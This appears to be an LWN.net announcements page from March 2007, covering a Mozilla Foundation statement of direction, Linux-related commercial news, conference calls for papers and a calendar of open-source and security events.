Mitchell Baker has posted an initial version of the Mozilla Foundation statement of direction, describing what the Foundation is trying to do. "The Mozilla Foundation seeks to effectuate these goals both by building broadly-used products that impact Internet development as a whole, and by empowering people to act in highly decentralized, experimental ways. The work of creating general consumer products that influence broad aspects of Internet development is currently handled through the Mozilla Corporation. The Foundation plans to increase its direct involvement in other activities which enable people to participate in the development and enjoyment of the Internet in a decentralized, self-directed manner."
Comments (14 posted)
Commercial announcements
ACCESS Systems Americas, Inc. has announced the demonstration of its ACCESS Linux Platform Development Suite at the EclipseCon 2007 conference. "ACCESS recently announced that the Product Development Kit (PDK) for ACCESS Linux Platform is now available to licensees. The Company has also launched their Early ACCESS Program for qualified third party developers interested in being first to market using the ACCESS Linux Platform Development Suite and Garnet(TM) VM Compatibility Kit."
Comments (none posted)
Novell, Inc. has announced its first quarter financial results for 2007. "For the first fiscal quarter 2007, Novell reported net revenue of $230 million, compared to net revenue of $242 million for the first fiscal quarter 2006. The loss available to common stockholders from continuing operations in the first fiscal quarter 2007 was $20 million, or $0.06 loss per common share. This compares to income available to common stockholders from continuing operations of $4 million, or $0.01 per diluted common share, for the first fiscal quarter 2006."
Comments (none posted)
TimeSys has announced the availability of LinuxLink Subscriptions for AMCC 440EPx Processors. "The partnership between TimeSys and AMCC allows customers of AMCC's popular PowerPC-based processors to use LinuxLink to build an enterprise-ready custom Linux platform. In addition to the new support for the 440EPx, TimeSys offers LinuxLink subscriptions for many other AMCC processors, including the 405EP, 405GP, 405GPr, 440EP, 440GP, 440GX, 440SP and 440SPe."
Full Story (comments: none)
TuxMobil is celebrating its 10th anniversary. "TuxMobil is the number one online resource providing information about Linux for laptops, PDAs, cellular phones and portable media players. In short, TuxMobil is all about Linux and portable devices. The name TuxMobil is an abridgement of the words Tux and "mobil." Tux is the well known name of the Linux mascot and "mobil" is a shortcut for mobile."
Full Story (comments: 2)
VMware, Inc. has announced the release of the public beta version of VMware ACE 2 enterprise edition. "VMware ACE is a breakthrough product that enables IT desktop managers to create a standard PC environment including operating system, data and applications, wrap it with IT policies to protect the contents, package it into a virtual machine and deploy it to any managed or unmanaged PC endpoint."
Comments (none posted)
Resources
The Free Software Foundation has announced the publication of a paper entitled "The road to hardware free from restrictions; on how hardware companies can make the free software community happier." "Hardware vendors could support the community by providing access under a permissive license to all the low-level hardware documentation necessary to port a free BIOS to their systems, and ideally offer engineering support."
Full Story (comments: none)
Calls for Presentations
A call for participation has gone out for the Chaos Communication Camp. "We ask you to participate in the third Chaos Communication Camp on August, 8th to 12th, 2007 near Berlin, Germany. The Chaos Communication Camp is organized by the Chaos Computer Club (CCC). It is an international, five-day open-air event for hackers and associated life-forms. The Camp features two conference tracks with interesting lectures. Workshops will take place in a central workshop area and in thematic "villages", organized by various groups." Submissions are due by May 15 with an overflow deadline of June 5.
Full Story (comments: none)
A call for papers and pre-registration announcement has gone out for LayerOne 2007, a security conference. The event takes place in Pasadena, CA on May 5-6, 2007; submissions are due by March 31. "Pre-registration is available from now until the end of April. The pre-registration cost is 80 dollars (US) and will get you into both days of the conference as well as the Saturday night entertainment. Tickets will be available at the door, but the cost will be 100.00 (US)."
Full Story (comments: none)
Upcoming Events
The Free Software Foundation will hold its annual associate member and activist meeting at MIT, Cambridge, MA on March 24, 2007. "Keynote speakers Richard Stallman (FSF president) and Eben Moglen (FSF director and legal counsel) will each address the "Year of the Upgrade" theme, looking at what issues will demand the free software movement's attention after the new version of the GNU General Public License (GPLv3) is released."
Full Story (comments: none)
Samba eXPerience 2007 will take place in Goettingen, Germany on April 23-25, 2007. "The organizers are happy to welcome Howard Chu (Chief Architect of OpenLDAP) as the keynote speaker. Talks from the WINE project and OpenChange show the link to other projects, a talk regarding Samba and GPLv3 reflects the current legal discussions - and of course developers, users and vendors cover the program with 25 talks in two days."
Full Story (comments: none)
Events: March 15, 2007 to May 14, 2007
The following event listing is taken from the
LWN.net Calendar.
| Date(s) | Event | Location |
|---|---|---|
| March 12 - March 16 | QCon | London, England |
| March 12 - March 16 | Third Annual Security Enhanced Linux Symposium | Baltimore, US |
| March 14 - March 16 | PHP Quebec Conference | Montreal, Canada |
| March 14 - March 17 | Barbeque Sprint for Plone3 | Charlotte, North Carolina, USA |
| March 15 - March 21 | CeBIT computer fair | Hannover, Germany |
| March 16 - March 17 | MountainWest RubyConf | Salt Lake City, USA |
| March 18 - March 23 | Novell BrainShare 2007 | Salt Lake City, Utah, USA |
| March 19 - March 21 | UKUUG LISA/Spring Conference 2007 | Manchester, UK |
| March 22 - March 25 | Linux Audio Conference | Berlin, Germany |
| March 23 - March 25 | ShmooCon | Washington DC, USA |
| March 23 - March 25 | Guademy | Coruña, Spain |
| March 24 | FSF Associate Membership Meeting | Cambridge, MA, USA |
| March 26 - March 29 | Emerging Technology Conference | San Diego, CA, USA |
| April 1 - April 4 | International Lisp Conference 2007 | Cambridge, England |
| April 1 - April 5 | Embedded Systems Conference | San Jose, CA, USA |
| April 1 | GPLv3: Improving a Great Licence (discussion draft 3) | Brussels, Belgium |
| April 2 - April 6 | Django Bootcamp | Atlanta, Georgia, USA |
| April 2 - April 5 | Hack in The Box Security Conference 2007 | Dubai, United Arab Emirates |
| April 3 - April 8 | Make Art 2007 | Poitiers, France |
| April 12 - April 14 | International Free Software Forum (Forum Internacional Software Livre) | Porto Alegre, Brazil |
| April 14 - April 15 | Ruby and Python Conference 2007 | Poznan, Poland |
| April 15 - April 18 | Gelato ICE: Itanium® Conference & Expo | San Jose, California, USA |
| April 17 - April 19 | Embedded Linux Conference | San Jose, USA |
| April 18 - April 20 | CanSecWest Applied Security Conference 2007 | Vancouver, Canada |
| April 19 | Linux 2007 | Lisbon, Portugal |
| April 19 | Power Architecture Software Summit | Austin, TX, USA |
| April 20 - April 22 | International Conference on Availability, Reliability and Security | Vienna, Austria |
| April 20 - April 22 | Penguicon 5.0 Open Source Software & Science Fiction Convention | Troy, Michigan, USA |
| April 21 | Romanian Open Source Development Meeting | Bucharest, Romania |
| April 23 - April 25 | Samba eXPerience 2007 | Göttingen, Germany |
| April 23 - April 27 | PostgreSQL Bootcamp at the Big Nerd Ranch | Atlanta, USA |
| April 23 - April 26 | MySQL Conference and Expo | Santa Clara, CA, USA |
| April 28 - April 29 | Linuxfest Northwest | Bellingham, WA, USA |
| May 3 - May 4 | Ubuntu Education Summit | Sevilla, Spain |
| May 3 - May 5 | SugarCRM Global Developer Conference | San Jose, CA, USA |
| May 4 - May 6 | Libre Graphics Meeting 2007 | Montreal, Quebec, Canada |
| May 5 - May 6 | LayerOne Security Conference | Pasadena, CA, USA |
| May 5 | Ubucon - Sevilla | Sevilla, Spain |
| May 6 - May 11 | Ubuntu Developer Summit | Sevilla, Spain |
| May 7 | CommunityOne | San Francisco, CA, USA |
| May 8 - May 9 | World Summit on Intrusion Prevention | Baltimore, MD, USA |
| May 8 - May 11 | Annual Java Technology Conference | San Francisco, CA, USA |
| May 8 - May 11 | OSHCA 2007 | Kuala Lumpur, Malaysia |
| May 9 - May 11 | Red Hat Summit | San Diego, CA, USA |
| May 10 - May 11 | IEEE International Workshop on Open Source Test Technology Tools | Berkeley, CA, USA |
| May 10 | NLUUG Spring Conference 2007 | Ede, The Netherlands |
| May 11 - May 13 | Conferenze Italiana sul Software Libero | Cosenza, Italy |
| May 12 - May 13 | KOffice ODF Weekend | Berlin, Germany |
If your event does not appear here, please tell us about it.
Page editor: Forrest Cook